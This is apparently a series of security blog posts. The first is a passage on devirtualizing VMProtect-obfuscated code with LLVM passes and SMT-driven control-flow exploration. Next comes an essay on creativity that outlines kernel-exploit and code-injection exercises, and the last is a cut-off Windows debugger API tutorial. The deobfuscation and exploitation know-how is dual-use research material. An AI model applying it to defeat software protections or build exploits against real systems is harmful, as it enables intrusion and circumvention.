  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the sliced program counter
  return vip;
}

The acute observer will notice that the function definition is basically identical to the HelperFunction definition given before, with the fundamental difference that the arguments are passed by value. They are therefore usable when related to the computation of the sliced expression, but their liveness scope ends at the end of the function, which guarantees that there won't be store operations to the host context that could possibly bloat the code.

The steps to use the above helper function are the following (a short C++ sketch is given right after the list):

  • The HelperSlicePC is cloned into a new throwaway function;
  • The call to the HelperStub function is swapped with a call to the VmBlock or VmStub of which we want to slice the final instruction pointer;
  • The called function is forcefully inlined into the HelperSlicePC function;
  • The optimization pipeline is executed on the cloned HelperSlicePC function resulting in the slicing of the final instruction pointer expression as a side-effect of the optimizations.
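
A condensed sketch of these four steps could look like the code below; runOptimizationPipeline stands in for the pipeline discussed later in this post, and the InlineFunction signature shown is the one exposed by recent LLVM versions:

#include "llvm/IR/Instructions.h"
#include "llvm/IR/Module.h"
#include "llvm/Transforms/Utils/Cloning.h"

using namespace llvm;

void runOptimizationPipeline(Function *F); // the pipeline described below

// Sketch: slice the final program counter of a lifted VmBlock or VmStub.
// Null checks and error handling are omitted for brevity.
Function *slicePC(Module &M, Function *VmPart) {
  // 1. Clone HelperSlicePC into a new throwaway function.
  ValueToValueMapTy VMap;
  Function *Clone = CloneFunction(M.getFunction("HelperSlicePC"), VMap);

  // 2. Swap the HelperStub call with a call to the VmBlock/VmStub of interest.
  CallInst *StubCall = nullptr;
  for (BasicBlock &BB : *Clone)
    for (Instruction &I : BB)
      if (auto *CI = dyn_cast<CallInst>(&I))
        if (CI->getCalledFunction() &&
            CI->getCalledFunction()->getName() == "HelperStub")
          StubCall = CI;
  StubCall->setCalledFunction(VmPart);

  // 3. Forcefully inline the called function into the clone.
  InlineFunctionInfo IFI;
  InlineFunction(*StubCall, IFI);

  // 4. Let the optimizations slice the final instruction pointer expression.
  runOptimizationPipeline(Clone);
  return Clone;
}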

The following LLVM-IR snippet shows the idea in action, resulting in the final optimized function where the condition and edges of the conditional branch are clearly visible.

define dso_local i64 @HelperSlicePC(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #5 {
  %1 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1) #4, !srcloc !9
  %2 = extractvalue { i32, i32, i32, i32 } %1, 0
  %3 = and i32 %2, 4080
  %4 = icmp eq i32 %3, 4064
  %5 = select i1 %4, i64 5371013457, i64 5371013227
  ret i64 %5
}

In the following section we’ll see how variations of this technique are used to explore the virtualized control flow graph, solve the conditional branches, and recover the switch cases.

Exploration

The exploration of a virtualized control flow graph can be done in different ways and usually protectors like VMProtect or Themida show a distinctive shape that can be pattern-matched with ease, simplified and parsed to obtain the outgoing edges of a conditional block.

The logic used by different VMProtect conditional jump versions has been detailed in the past, so in this section we are going to delve into an SMT-driven algorithm based on the incremental construction of the explored control flow graph and specifically built on top of the slicing logic explained in the previous section.

Given the generic nature of the detailed algorithm, nothing stops it from being used on other protectors. The usual catch is obviously caused by protections embedding hard to solve constraints that may hinder the automated solving phase, but the construction and propagation of the partial CFG constraints and expressions could still be useful in practice to pull out less automated exploration algorithms, or to identify and simplify anti-dynamic symbolic execution tricks (e.g. dummy loops leading to path explosion that could be simplified by LLVM’s loop optimization passes or custom user passes).

Partial CFG

A partial control flow graph is a control flow graph built by connecting the currently explored basic blocks given the known edges between them. The idea behind building it is that each time we explore a new basic block, we gather new outgoing edges that could lead to new unexplored basic blocks, or even to known basic blocks. Every new edge between two blocks therefore adds information to the entire control flow graph, and we can propagate new useful constraints and values to enable stronger optimizations, possibly easing the solving of the conditional branches or even changing a known branch from unconditional to conditional.

Let’s look at two motivating examples of why building a partial CFG may be a good idea to be able to replicate the kind of reasoning usually implemented by symbolic execution tools, with the addition of useful built-in LLVM passes.

Motivating example #1

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlock and purple the VmBlock of interest for the example.

Motivating example 1

Let's assume we just solved the outgoing edges for the basic block A, obtaining two connections leading to the new basic blocks B and C. Now assume that we sliced the branch condition of basic block B alone, obtaining an access into a constant array with a 64-bit symbolic index. Enumerating all the valid indices may be a non-trivial task, so we may want to restrict the search using known constraints on the symbolic index that, if present, are most likely going to come from the chain(s) of predecessor(s) of the basic block B.

To draw a symbolic execution parallel, this is the case where we want to collect the path constraints from a certain number of predecessors (e.g. we may want to incrementally harvest the constraints, because sometimes the needed constraint is locally near to the basic block we are solving) and chain them to be fed to an SMT solver to execute a successful enumeration of the valid indices.

Tools like Souper automatically harvest the set of path constraints while slicing an expression, so building the partial control flow graph and feeding it to Souper may be sufficient for the task. Additionally, with the LLVM API to walk the predecessors of a basic block it’s also quite easy to obtain the set of needed constraints and, when available, we may also take advantage of known-to-be-true conditions provided by the llvm.assume intrinsic.

Motivating example #2

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlocks, purple the VmBlock of interest for the example, dashed red arrows the edges of interest for the example and the solid green arrow an edge that has just been processed.

Motivating example 2

Let's assume we just solved the outgoing edges for the basic block E, obtaining two connections leading to a new block G and a known block B. In this case we know that we detected a jump to the previously visited block B (edge in green), which is basically forming a loop chain (BCEB). We also know that starting from B we can reach two edges (BC and DF, marked in dashed red) that are currently known as unconditional, but that, given the newly obtained edge EB, may not be anymore and will therefore need to be proved again. Building a new partial control flow graph including all the newly discovered basic block connections and slicing the branch of the blocks B and D may now show them as conditional.

As a real world case, when dealing with concolic execution approaches, the one mentioned above is the usual pattern that arises with index-based loops, starting with a known concrete index and running until the index reaches an upper or lower bound N. During the first N-1 executions the tool would take the same path, and only at iteration N would the other path be explored. That's the reason why concolic and symbolic execution tools attempt to build heuristics or use techniques like state-merging to avoid running into path explosion issues (or at best executing the loop N times).

Building the partial CFG with LLVM instead would mark the loop back edge as unconditional the first time, but building it again, including the knowledge of the newly discovered back edge, would immediately reveal the loop pattern. The outcome is that LLVM would now be able to apply its loop analysis passes, the user would be able to use the API to build ad-hoc LoopPass passes to handle special obfuscation applied to the loop components (e.g. encoded loop variant/invariant; a minimal skeleton of such a pass is sketched below), and the SMT solvers would be able to treat newly created Phi nodes at the merge points as symbolic variables.
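
To give an idea of the LoopPass option, a minimal legacy-pass-manager skeleton (with a hypothetical name and an intentionally empty body) that could host the ad-hoc handling of encoded loop variants/invariants looks like this:

#include "llvm/Analysis/LoopInfo.h"
#include "llvm/Analysis/LoopPass.h"

using namespace llvm;

namespace {
struct EncodedLoopVariantPass : public LoopPass {
  static char ID;
  EncodedLoopVariantPass() : LoopPass(ID) {}

  bool runOnLoop(Loop *L, LPPassManager &LPM) override {
    // Inspect the canonical induction variable, if LLVM recognized one, and
    // pattern-match/simplify the encoded loop variant or invariant here.
    if (PHINode *IV = L->getCanonicalInductionVariable())
      (void)IV;
    return false; // return true only when the IR has been modified
  }
};
} // namespace

char EncodedLoopVariantPass::ID = 0;

// Adding it to the custom pipeline described later is then just:
//   FPM.add(new EncodedLoopVariantPass());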

The following LLVM-IR snippet shows the sliced partial control flow graphs obtained during the exploration of the virtualized assembly snippet presented below.

start:
  mov rax, 2000
  mov rbx, 0
loop:
  inc rbx
  cmp rbx, rax
  jne loop

The original assembly snippet.

define dso_local i64 @FirstSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = call i64 @HelperKeepPC(i64 5369464257)
  ret i64 %1
}

The first partial CFG obtained during the exploration phase

define dso_local i64 @SecondSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  %5 = select i1 %4, i64 5369183207, i64 5369464257
  %6 = call i64 @HelperKeepPC(i64 %5)
  %7 = icmp eq i64 %6, 5369464257
  br i1 %7, label %1, label %8

8:                                                ; preds = %1
  ret i64 233496237
}

The second partial CFG obtained during the exploration phase. The block 8 is returning the dummy 0xdeadead (233496237) value, meaning that the VmBlock instructions haven't been lifted yet.

define dso_local i64 @F_0x14000101f_NoLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  br i1 %4, label %5, label %1

5:                                                ; preds = %1
  store i64 %3, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The final CFG obtained at the completion of the exploration phase.

define dso_local i64 @F_0x14000101f_WithLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  store i64 2000, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The loop-optimized final CFG obtained at the completion of the exploration phase.

The FirstSlice function shows that a single unconditional branch has been detected, identifying the bytecode address 0x1400B85C1 (5369464257), this is because there’s no knowledge of the back edge and the comparison would be cmp 1, 2000. The SecondSlice function instead shows that a conditional branch has been detected selecting between the bytecode addresses 0x140073BE7 (5369183207) and 0x1400B85C1 (5369464257). The comparison is now done with a symbolic PHINode. The F_0x14000101f_WithLoopOpt and F_0x14000101f_NoLoopOpt functions show the fully devirtualized code with and without loop optimizations applied.

Pseudocode

Given the knowledge obtained from the motivating examples, the pseudocode for the automated partial CFG driven exploration is the following (a compact C++ rendition of the same loop follows the list):

  1. We initialize the algorithm creating:

    • A stack of addresses of VmBlocks to explore, referred to as Worklist;
    • A set of addresses of explored VmBlocks, referred to as Explored;
    • A set of addresses of VmBlocks to reprove, referred to as Reprove;
    • A map of known edges between the VmBlocks, referred to as Edges.
  2. We push the address of the entry VmBlock into the Worklist;
  3. We fetch the address of a VmBlock to explore, we lift it to LLVM-IR if met for the first time, we build the partial CFG using the knowledge from the Edges map and we slice the branch condition of the current VmBlock. Finally we feed the branch condition to Souper, which will process the expression harvesting the needed constraints and converting it to an SMT query. We can then send the query to an SMT solver, asking for the valid solutions, incrementally rejecting the known solutions up to some limit (worst case) or till all the solutions have been found.
  4. Once we obtained the outgoing edges for the current VmBlock, we can proceed with updating the maps and sets:

    • We verify if each solved edge is leading to a known VmBlock; if it is, we verify if this connection was previously known. If unknown, it means we found a new predecessor for a known VmBlock and we proceed with adding the addresses of all the VmBlocks reachable by the known VmBlock to the Reprove set and removing them from the Explored set; to speed things up, we can eventually skip each VmBlock known to be firmly unconditional;
    • We update the Edges map with the newly solved edges.
  5. At this point we check if the Worklist is empty. If it isn’t, we jump back to step 3. If it is, we populate it with all the addresses in the Reprove set, clearing it in the process and jumping back to step 3. If also the Reprove set is empty, it means we explored the whole CFG and eventually reproved all the VmBlocks that obtained new predecessors during the exploration phase.
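
The sketch below condenses the worklist loop described above; solveOutgoingEdges hides the lift/partial-CFG/slice/Souper/SMT machinery of step 3, and reachableFrom is assumed to return the given block plus every block reachable from it through the known edges:

#include <cstdint>
#include <map>
#include <set>
#include <vector>

// Hypothetical helpers wrapping the solving and reachability logic.
std::set<uint64_t> solveOutgoingEdges(
    uint64_t block, const std::map<uint64_t, std::set<uint64_t>> &edges);
std::set<uint64_t> reachableFrom(
    uint64_t block, const std::map<uint64_t, std::set<uint64_t>> &edges);

void exploreCfg(uint64_t entryBlock) {
  std::vector<uint64_t> Worklist{entryBlock};            // steps 1 and 2
  std::set<uint64_t> Explored;
  std::set<uint64_t> Reprove;
  std::map<uint64_t, std::set<uint64_t>> Edges;

  while (!Worklist.empty() || !Reprove.empty()) {
    if (Worklist.empty()) {                              // step 5
      Worklist.assign(Reprove.begin(), Reprove.end());
      Reprove.clear();
    }
    uint64_t Block = Worklist.back();
    Worklist.pop_back();
    if (!Explored.insert(Block).second)
      continue;

    // Step 3: lift (if needed), build the partial CFG and solve the branch.
    for (uint64_t Target : solveOutgoingEdges(Block, Edges)) {
      bool NewEdge = Edges[Block].insert(Target).second;
      if (Explored.count(Target) && NewEdge) {
        // Step 4: a known block gained a new predecessor, so it and every
        // block reachable from it have to be proved again.
        for (uint64_t R : reachableFrom(Target, Edges)) {
          Reprove.insert(R);
          Explored.erase(R);
        }
      } else if (!Explored.count(Target)) {
        Worklist.push_back(Target);
      }
    }
  }
}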

As mentioned at the start of the section, there are many ways to explore a virtualized CFG and using an SMT-driven solution may generalize most of the steps. Obviously, it brings its own set of issues (e.g. hard to solve constraints), so one could eventually fall back to the pattern matching based solution when needed. As expected, the pattern matching based solution would also blindly explore unreachable paths at times, so a mixed solution could really offer the best CFG coverage.

The pseudocode presented in this section is a simplified version of the partial CFG based exploration algorithm used by SATURN at this point in time, streamlined from a set of reasonings that are unnecessary while exploring a CFG virtualized by VMProtect.

Pipeline

So far we hinted at the underlying usage of LLVM's optimization and analysis passes multiple times through the sections, so we can finally take a look at how they fit in, their configuration and their limitations.

Managing the pipeline

Running the whole -O3 pipeline may not always be the best idea, because we may want to use only a subset of passes, instead of wasting cycles on passes that we know a priori don’t have any effect on the lifted LLVM-IR code. Additionally, by default, LLVM is providing a chain of optimizations which is executed once, is meant to optimize non-obfuscated code and should be as efficient as possible.

In our case, however, we have different needs and want to be able to:

  • Add some custom passes to tackle context-specific problems and do so at precise points in the pipeline to obtain the best possible output, while avoiding phase ordering issues;
  • Iterate the optimization pipeline more than once, ideally until our custom passes can’t apply any more changes to the IR code;
  • Be able to pass custom flags to the pipeline to toggle some passes at will and eventually feed them with information obtained from the binary (e.g. access to the binary sections).

LLVM provides a FunctionPassManager class to craft our own pipeline, using LLVM’s passes and custom passes. The following C++ snippet shows how we can add a mix of passes that will be executed in order until there won’t be any more changes or until a threshold will be reached:

void optimizeFunction(llvm::Function *F, OptimizationGuide &G) {
  // Fetch the Module
  auto *M = F->getParent();
  // Create the function pass manager
  llvm::legacy::FunctionPassManager FPM(M);
  // Initialize the pipeline
  llvm::PassManagerBuilder PMB;
  PMB.OptLevel = 3;
  PMB.SizeLevel = 2;
  PMB.RerollLoops = false;
  PMB.SLPVectorize = false;
  PMB.LoopVectorize = false;
  PMB.Inliner = createFunctionInliningPass();
  // Add the alias analysis passes
  FPM.add(createCFLSteensAAWrapperPass());
  FPM.add(createCFLAndersAAWrapperPass());
  FPM.add(createTypeBasedAAWrapperPass());
  FPM.add(createScopedNoAliasAAWrapperPass());
  // Add some useful LLVM passes
  FPM.add(createCFGSimplificationPass());
  FPM.add(createSROAPass());
  FPM.add(createEarlyCSEPass());
  // Add a custom pass here
  if (G.RunCustomPass1)
    FPM.add(createCustomPass1(G));
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Add a custom pass here
  if (G.RunCustomPass2)
    FPM.add(createCustomPass2(G));
  FPM.add(createGVNHoistPass());
  FPM.add(createGVNSinkPass());
  FPM.add(createDeadStoreEliminationPass());
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Execute the pipeline
  size_t minInsCount = F->getInstructionCount();
  size_t pipExeCount = 0;
  FPM.doInitialization();
  do {
    // Reset the IR changed flag
    G.HasChanged = false;
    // Run the optimizations
    FPM.run(*F);
    // Check if the function changed
    size_t curInsCount = F->getInstructionCount();
    if (curInsCount < minInsCount) {
      minInsCount = curInsCount;
      G.HasChanged |= true;
    }
    // Increment the execution count
    pipExeCount++;
  } while (G.HasChanged && pipExeCount < 5);
  FPM.doFinalization();
}

The OptimizationGuide structure can be used to pass information to the custom passes and control the execution of the pipeline.
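
Its actual definition lives in the PoC sources; a plausible shape, keeping the fields referenced by the snippet above and adding a purely illustrative example of extra knowledge fed to the custom passes, could be:

#include <cstdint>
#include <utility>
#include <vector>

// Illustrative only: the real structure is defined in the PoC sources.
struct OptimizationGuide {
  bool RunCustomPass1 = true;  // toggles the first custom pass
  bool RunCustomPass2 = true;  // toggles the second custom pass
  bool HasChanged = false;     // set when an iteration modified the IR
  // Example of binary-derived knowledge passed to the custom passes,
  // e.g. address ranges that can be treated as read-only constant data.
  std::vector<std::pair<uint64_t, uint64_t>> ReadOnlyRanges;
};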

Configuration

As previously stated, the LLVM default pipeline is meant to be as efficient as possible, therefore it’s configured with a tradeoff between efficiency and efficacy in mind. While devirtualizing big functions it’s not uncommon to see the effects of the stricter configurations employed by default. But an example is worth a thousand words.

In the Godbolt UI we can see on the left a snippet of LLVM-IR code that is storing i32 values at increasing indices of a global array named arr. The store at line 96, writing the value 91 at arr[1], is a bit special because it is fully overwriting the store at line 6, writing the value 1 at arr[1]. If we look at the upper right result, we see that the DSE pass was applied, but somehow it didn't do its job of removing the dead store at line 6. If we look at the bottom right result instead, we see that the DSE pass managed to achieve its goal and successfully killed the dead store at line 6. The reason for the difference is entirely associated with a conservative configuration of the DSE pass, which by default (at the time of writing) walks up to 90 MemorySSA definitions before deciding that a store is not killing another post-dominated store. Setting the MemorySSAUpwardsStepLimit to a higher value (e.g. 100 in the example) is definitely something that we want to do while deobfuscating some code.
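
Since these knobs are exposed as cl::opt command line options, one way to relax them from the host application is to feed a synthetic argv to the option parser. The flag name below is an assumption to be checked against the DeadStoreElimination.cpp of the LLVM version in use, since these option names have changed across releases:

#include "llvm/Support/CommandLine.h"

// Assumed flag name; verify it in DeadStoreElimination.cpp for your release.
void relaxDseWalkLimit() {
  const char *Args[] = {"deobfuscator", "-dse-memoryssa-walklimit=100"};
  llvm::cl::ParseCommandLineOptions(2, Args);
}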

Each pass that we are going to add to the custom pipeline is going to have configurations that may be giving suboptimal deobfuscation results, so it’s a good idea to check their C++ implementation and figure out if tweaking some of the options may improve the output.

Limitations

When tweaking some configurations is not giving the expected results, we may have to dig deeper into the implementation of a pass to understand if something is hindering its job, or roll up our sleeves and develop a custom LLVM pass. Some examples on why digging into a pass implementation may lead to fruitful improvements follow.

IsGuaranteedLoopInvariant (DSE, MSSA)

While looking at some devirtualized code, I noticed some clearly-dead stores that weren't removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diffs: D96979, D97155. The bottom line is that the IsGuaranteedLoopInvariant function used by the DSE and MSSA passes was not using the safe assumption that a pointer computed in the entry block is, by design, guaranteed to be loop invariant, as the entry block of a Function is guaranteed to have no predecessors and not to be part of a loop.

GetPointerBaseWithConstantOffset (DSE)

While looking at some devirtualized code that was accessing memory slots of different sizes, I noticed some clearly-dead stores that weren't removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diff: D97676. The bottom line is that while computing the partially overlapping memory stores, the DSE was considering only memory slots with the same base address, ignoring fully overlapping stores offset from each other. The solution makes use of another patch, which provides information about the offsets of the memory slots: D93529.

Shift-Select folding (InstCombine)

And obviously there is no two without three! Nah, just kidding, a patch I wanted to get accepted to simplify one of the recurring patterns in the computation of the VMProtect conditional branches has been on pause because InstCombine is an extremely complex piece of code and additions to it, especially if related to uncommon patterns, are unwelcome and seen as possibly bloating and slowing down the entire pipeline. Additional information on the pattern and the reasons that hinder its folding are available in the following differential: D84664. Nothing stops us from maintaining our own version of InstCombine as a custom pass, with ad-hoc patterns specifically selected for the obfuscation under analysis.

What’s next?

In Part 3 we’ll have a look at a list of custom passes necessary to reach a superior output quality. Then, some words will be spent on the handling of the unsupported instructions and on the recompilation process. Last but not least, the output of 6 devirtualized functions, with varying code constructs, will be shown.

Security Research and the Creative Process

I get asked pretty often about my research process, how I find research ideas and how I approach a new idea or project. I don’t find those questions especially useful — the answers are usually very specific and not necessarily helpful to anyone not focusing on my specific corner of infosec or working exactly the way I like to work. So instead of answering these questions here, I will talk about something that I think the security industry doesn’t focus on enough — creativity. Because creativity is at the base of all that we do: finding a new research project, bypassing a security mitigation, hunting for a source of a bug, and pretty much everything else. This is the point where a lot of you jump in to say “but I’m just not creative!” and I politely disagree and tell you that regardless of your basic level of creativity, there are a few tricks that can improve it, or at least make your work more interesting and fun.

These are tricks that I mostly learned while practicing circus and then translated them to my tech work and research. You can pretty much apply them to anything you do, technical or not.

Can Limitations Be a Good Thing?

This could sound counter-intuitive but adding artificial roadblocks can encourage your brain to look at a problem from a different perspective and build different paths around it. Think of tying your right arm behind your back — yes it will be extremely inconvenient, but it will also force you to learn how to get more functionality from your left, or learn how to do things single-handedly when you used to use two hands for them. Maybe you’ll even learn to use your legs or other body parts for help.

In a similar way, adding limitations to your research can force you to try new things, learn new techniques or maybe even develop a whole new thing to overcome the “roadblock”. A few practical examples of that would be:

1. Creating a kernel exploit which patches the token’s privileges, but can only patch the “Present” bits and not the “Enabled” bits, demonstrated here: Exploiting a “Simple” Vulnerability, Part 2 — What If We Made Exploitation Harder? — Winsider Seminars & Solutions Inc. (windows-internals.com)

2. Writing a code injector, but injecting code into a process where Dynamic Code Guard is enabled — meaning no dynamic code is allowed so you can’t allocate and write a shellcode into arbitrary memory.

3. Writing a test malware, but without using any of your usual persistence methods.

4. Creating a tool to monitor the system for malicious activity — one that is not allowed to load a kernel driver and can only run in User-Mode.

An easy way to enforce real-world limitations on an offensive project would be to enable security mitigations — you could take an exploit that was written for an old operating system, or one that enables almost no security mitigations, and slowly enable newer mitigations and find ways to bypass them. First enable ASLR, then CFG, Dynamic Code Guard… you can work your way up to a fully patched Windows 10 machine enabling VBS, HVCI, etc.

Solve the Maze Backwards

Do you know the feeling of having a new project, knowing what you need to do and then spending the next five hours staring at an empty IDE and feeling overwhelmed? Yeah, me too. Starting a project is always the hardest part. But you don’t actually need to start it at the beginning. Remember being a kid, solving the maze on the back of the cereal box and always starting from the end because for some reason it made it so much easier? (Please tell me I’m not the only one who did that). Good news — you can do the same thing with your research project!

Let’s imagine you’re trying to write a kernel exploit that needs to do the following things:

1. Find the base address of ntoskrnl.exe.

2. Search for the offset of a specific global variable that you want to overwrite.

3. Write a shellcode into memory.

4. Patch the global variable from step 2 to point to your shellcode.

Now let's say you have no idea how to do step #1, doing binary searches is gross and not fun so you're not excited about step #2, and you hate writing shellcodes so you're really not looking forward to step #3. However, step #4 seems great and you know exactly how to do it. Sadly it's all the way on the other side of steps 1–3 and you don't know how you'll ever manage to find the motivation to get all the way there.

You don’t have to — you can “cheat” and use a debugger to find the address of the global variable in memory and hard-code it. Then you can use the debugger again to write a simple “int 3” instruction somewhere in memory and hard-code that address as well. Then you implement step #4 as if steps 1–3 are already done. This method is way more fun and should give your brain the dopamine boost it needs to at least try to implement one of the other steps. Besides, adding features to existing code is about 1000x easier than writing code where nothing exists.

You don’t have to start from the end either — you can pick any step that seems the easiest or the most fun and start from there and slowly build the steps around it later.

Give Yourself a Break

This advice is given so often it's basically a cliché but it's true so I feel like I have to say it: If you've been staring at your project for an hour and made no progress — stop. Go for a walk, take a shower, take a nap, go have that lunch you probably skipped because you were too focused on work, or if you feel too guilty to step away from the computer — at least work on a different task. Preferably something quick and easy to make your brain feel that you achieved something and allow you to take an actual break. Allowing your brain to rest and focus on some other things will make it happy, and the solution to the issue you've been stuck on will probably come to you while you're not working anyway.

These tips might not work for everyone, but they usually work for me when I'm stuck or out of ideas, so I hope at least some of them will work for you too!

Windows Debugger API — The End of Versioned Structures

Some time ago I was introduced to the Windows debugger API and found it incredibly useful for projects that focus on forensics or analysis of data on a machine. This API allows us to open a dump file taken on any windows machine and read information from it using the symbols that match the specific modules contained in the dump.

This API can be used in live debugging as well, either user-mode debugging of a process or kernel debugging. This post will show how to use it to analyze a memory dump, but this can be converted to live debugging relatively easily.

The main benefit of the debugger API is that it uses the specific symbols for the Windows version that it is running against, letting us write code that will work with any Windows version without having to keep an ever-growing header of structures for different versions, and without needing to choose the right one and update our code every time the structure changes. For example, a common data structure to look at on Windows is the process, represented in the kernel by the EPROCESS structure. This structure changes almost every Windows build, meaning that fields inside it keep moving around. A field we are interested in might be at offset 0x100 in one Windows version, 0x120 in another, 0x108 in another, and so on. If we use the wrong offset the driver will not work properly and is very likely to accidentally crash the system. By using the symbols, we also receive the correct size and type of each structure and its sub-structures, so a nested structure getting larger, or a field changing its type, for example being a push lock in one version and a spin lock in another, will be handled correctly by the debugger API without any code changes on our side.

The debugger API avoids this problem entirely by using symbols, so we can write our code once and it will run successfully on dumps taken from every possible Windows version without any need for updates when new builds are released. Also, it runs in user-mode so it doesn't have all the inherent risks that kernel mode code carries with it, and since it can operate on a dump file, it doesn't have to run on the machine that it analyzes, which can be a huge benefit, as sometimes we can't run our debugging tools on the machine we are interested in. This also lets us do extremely complicated things on much faster machines, such as analyzing a dump — or many dumps — in the cloud.

The main disadvantage of it is that the interface is not as easy as just using the types directly, and it takes some effort to get used to it. It also means slightly uglier, less readable code, unless you create macros around some of the calls.

In this post we'll learn how to write a simple program that opens a memory dump, iterates over all the processes and prints the name and PID of each one. For anyone not familiar with process representation in the Windows kernel, all the processes are linked together by a linked list (that is, a LIST_ENTRY structure that points to the next entry and the previous entry). This list is pointed to by the nt!PsActiveProcessHead symbol and is found at the ActiveProcessLinks field of the EPROCESS structure. Of course, the symbol is not exported and the EPROCESS structure is not available in any of the public headers, so implementing this in a driver would require some hard-coded offsets and version checks to get the right offsets for each version. Or we can use the debugger API instead!

To access all of this functionality we'll need to include DbgEng.h and link against DbgEng.lib. And this is the right time for an important tip shared by Alex Ionescu — the debugging-related DLLs supplied by Windows are unstable and will often simply not work at all and leave you confused and wondering what you did wrong and why your code that was perfectly good yesterday is suddenly failing. WinDbg comes with its own versions of all the DLLs required for this functionality, which are way better. So you'll want to copy Dbgeng.dll, Dbghelp.dll and Symsrv.dll from the directory where windbg.exe is into your output directory of this project. Do whatever you need to do to remember to always use the DLLs that come with WinDbg; this will save you a lot of time and frustration later.

Now that we have that covered we can start writing the code. Before we can access the dump file, we need to initialize 4 basic variables:

IDebugClient* debugClient;
IDebugSymbols* debugSymbols;
IDebugDataSpaces* dataSpaces;
IDebugControl* debugControl;

These will let us open the dump, access its memory and the symbols for all the modules in it and use them to parse the contents of the dump. First, we call DebugCreate to initialize the debugClient variable:

DebugCreate(__uuidof(IDebugClient), (PVOID*)&debugClient);

Note that all the functions we’ll use here return an HRESULT that should be validated using SUCCEEDED(result). In this post I will skip those validations to keep the code smaller and easier to read, but in any real program these should not be skipped.
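
For completeness, a tiny illustrative helper (not part of the debugger API) is enough to keep the checks without cluttering every call site; it assumes the enclosing function returns an HRESULT:

#define CHECK_HR(expr)                                                  \
    do {                                                                \
        HRESULT hr_ = (expr);                                           \
        if (!SUCCEEDED(hr_)) {                                          \
            printf("'%s' failed with 0x%08x\n", #expr, (unsigned)hr_);  \
            return hr_;                                                 \
        }                                                               \
    } while (0)

// Usage:
// CHECK_HR(DebugCreate(__uuidof(IDebugClient), (PVOID*)&debugClient));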

After we initialized debugClient we can use it to initialize the other 3:

debugClient->QueryInterface(__uuidof(IDebugSymbols),
